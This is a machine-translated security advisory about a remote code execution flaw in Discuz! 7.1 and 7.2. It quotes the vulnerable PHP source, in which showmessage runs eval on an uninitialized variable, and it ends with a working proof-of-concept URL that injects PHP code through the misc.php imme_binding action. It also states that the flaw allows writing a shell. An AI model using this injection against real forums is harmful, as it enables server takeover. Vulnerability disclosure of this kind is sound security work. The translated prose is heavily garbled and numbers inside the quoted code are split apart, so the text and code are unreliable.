Discuz! 7.1 & 7.2 remote code execution vulnerability-vulnerability warning-the black bar safety net

2010-01-08T00:00:00
ID MYHACK58:62201025856
Type myhack58
Reporter 佚名
Modified 2010-01-08T00:00:00

Description

First of all the way, vulnerability is t00ls heart of the Swarm spread out, xhming go read, and then I later read, the read-out of all code execution, 1 On 5 The Night of 1 1 o'clock, in the core group of hackers, xhming gave a poc, I gave an exp, do find the same problem. Off night 2 points more I offline, also only t00ls core group where few people know I give out exp, can I how also can not think, after half a day, the exp is flying, and, indeed, from yesterday I that version.

Not difficult to imagine that the exp flow speed, A and B have a good relationship, A to B; B and C are friends, B to C...there are always people resistant to live temper, the leak points of the wind, so he hands a copy. Most can't stand, even some of the SB in the group brought their wares; and really don't want to say anything, to huckster when is your turn? The heart is not ancient, after some words or your own hide.

The morning of vulnerability to tell the Saiy, DZ official patch soon to come out.

Special note: to produce the vulnerability of the$scriptlang array plug-in is installed after it has been initialized, and therefore have to install the plug-in users are not affected.

Vulnerability description:

Discuz it! The new version 7. 1 and 7. 2 version of the showmessage function to eval in the implementation the parameter is not initialized, can any Submission, which can execute arbitrary PHP commands.

Vulnerability analysis:

The following analysis of the remote code execution vulnerability, this problem is really serious, you can write directly to the shell:

First, the vulnerability from the showmessage function:

`function showmessage($message, $url_forward = ", $extra = ", $forwardtype = 0) { extract($GLOBALS, EXTR_SKIP);//dangerous usage of not initialized variables can be directly brought into function, a direct result of the problems, from www.oldjun.com global $hookscriptmessage, $extrahead, $discuz_uid, $discuz_action, $debuginfo, $seccode, $seccodestatus, $fid, $tid, $charset, $show_message, $inajax, $_DCACHE, $advlist; define('CACHE_FORBIDDEN', TRUE); $hookscriptmessage = $show_message = $message;$messagehandle = 0; $msgforward = unserialize($_DCACHE['settings']['msgforward']); $refreshtime = intval($msgforward['refreshtime']); $refreshtime = empty($forwardtype) ? $refreshtime : ($refreshtime ? $refreshtime : 3); $msgforward['refreshtime'] = $refreshtime * 1 0 0 0; $url_forward = empty($url_forward) ? ": (empty($_DCOOKIE['sid']) && $transsidstatus ? transsid($url_forward) : $url_forward); $seccodecheck = $seccodestatus & 2; if($_DCACHE['settings']['funcsiteid'] && $_DCACHE['settings']['funckey'] && $funcstatinfo && ! IS_ROBOT) { $statlogfile = DISCUZ_ROOT.'./ forumdata/funcstat. log'; if($fp = @fopen($statlogfile, 'a')) { @flock($fp, 2); if(is_array($funcstatinfo)) { $funcstatinfo = array_unique($funcstatinfo); foreach($funcstatinfo as $funcinfo) { fwrite($fp, funcstat_query($funcinfo, $message)."\ n"); } } else { fwrite($fp, funcstat_query($funcstatinfo, $message)."\ n"); } fclose($fp); $funcstatinfo = $GLOBALS['funcstatinfo'] = "; } }

if(! defined('STAT_DISABLED') && STAT_ID > 0 && ! IS_ROBOT) { write_statlog($message); }

if($url_forward && (! empty($quickforward) || empty($inajax) && $msgforward['quick'] && $msgforward['messages'] && @in_array($message, $msgforward['messages']))) { updatesession(); dheader("location: ". str_replace('&', '&', $url_forward)); } if(! empty($infloat)) { if($extra) { $messagehandle = $extra; } $extra = "; } if(in_array($extra, array('HALTED', 'NOPERM'))) { $discuz_action = 2 5 4; } else { $discuz_action = 2 5 5; }

include language('messages');

$vars = explode(':', $message);//as long as containing:can. if(count($vars) == 2 && isset($scriptlang[$vars[0]][$vars[1]])) {//two numbers can be, with:division eval("\$show_message = \"". str_replace('"', '\"', $scriptlang[$vars[0]][$vars[1]])."\";");//$ scriptlang not initialized, can be customized, from www.oldjun.com } elseif(isset($language[$message])) { $pre = $inajax ? 'ajax_' : "; eval("\$show_message = \"". (isset($language[$pre.$ message]) ? $language[$pre.$ message] : $language[$message])."\";"); unset($pre); }

...... } `

Second, the DZ of the global mechanism leads to a not initialized the parameters can be any of the submission:

foreach(array('_COOKIE', '_POST', '_GET') as $_request) { foreach($$_request as $ _ key => $_value) { $ _ Key{0} != '_' && $$ _ Key = daddslashes($_value); } }

Third, the misc. php just to have a custom message, in fact, is also not initialized:

`elseif($action == 'imme_binding' && $discuz_uid) {

if(isemail($id)) { $msn = $db->result_first("SELECT msn FROM {$tablepre}memberfields WHERE uid='$discuz_uid'"); $msn = explode("\t", $msn); $id = dhtmlspecialchars(substr($id, 0, strpos($id, '@'))); $msn = "$msn[0]\t$id"; $db->query("UPDATE {$tablepre}memberfields SET msn='$msn' WHERE uid='$discuz_uid'"); showmessage('msn_binding_succeed', 'memcp.php'); } else { if($result == 'Declined') { dheader("Location: memcp.php"); } else { showmessage($response['result']);//$response is not initialized, can be customized, from www.oldjun.com

} }

} `

Fourth, vulnerability to the use of:

showmessage function$vars = explode(':', $message);then the message can be its own control, so it is very easy, the parameter is two of the custom array.

Fifth, the vulnerability fix:

  1. There is a patch of the patch; and
  2. No patch can being the first to comment cause the vulnerability of the statement, or to the two variables assigned a value.

poc:the

Should Saiy requirements, not exp. Register aUser login,then submit misc. php? action=imme_binding&response[result]=1:2&scriptlang[1][2]={${phpinfo()}}